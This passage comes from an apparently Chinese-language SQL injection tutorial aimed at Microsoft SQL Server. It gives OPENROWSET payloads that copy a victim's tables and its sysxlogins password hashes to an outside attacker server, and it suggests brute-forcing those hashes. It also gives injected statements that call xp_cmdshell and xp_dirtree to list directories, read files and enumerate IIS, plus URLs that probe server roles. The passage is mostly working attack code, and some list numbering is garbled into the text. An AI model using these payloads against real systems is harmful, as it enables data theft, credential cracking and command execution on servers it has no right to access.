;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;'', ''select * from _sysobjects'')
select * from user_database.dbo.sysobjects
insert into OPENROWSET(''SQLOLEDB'', ''uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;'', ''select * from _syscolumns'')
select * from user_database.dbo.syscolumns
之后,便可以从本地数据库中看到目标主机的库结构,这已经易如反掌,不多讲,复制数据库:
insert into OPENROWSET(''SQLOLEDB'', ''uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;'', ''select * from table1'') select * from database..table1
insert into OPENROWSET(''SQLOLEDB'', ''uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;'', ''select * from table2'') select * from database..table2
3、 复4、 制哈西表(HASH)
这实际上是上述复5、 制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(''SQLOLEDB'', ''uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;'', ''select * from _sysxlogins'') select * from database.dbo.sysxlogins
得到hash之后,6、 就可以进行暴力破解。这需要一点运气和大量时间。
遍历目录的方法:
先创建一个临时表:temp
''5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5'';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
5'';insert into temp(id) exec master.dbo.xp_subdirs ''c:\'';-- 获得子目录列表
5'';insert into temp(id,num1) exec master.dbo.xp_dirtree ''c:\'';-- 获得所有子目录的目录树结构,并寸入temp表中
5'';insert into temp(id) exec master.dbo.xp_cmdshell ''type c:\web\index.asp'';-- 查看某个文件的内容
5'';insert into temp(id) exec master.dbo.xp_cmdshell ''dir c:\'';--
5'';insert into temp(id) exec master.dbo.xp_cmdshell ''dir c:\ *.asp /s/a'';--
5'';insert into temp(id) exec master.dbo.xp_cmdshell ''cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc''
5'';insert into temp(id,num1) exec master.dbo.xp_dirtree ''c:\'';-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''sysadmin''));--
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''serveradmin''));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''setupadmin''));--
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''securityadmin''));--
语句5:http://www.xxxxx.com/down/list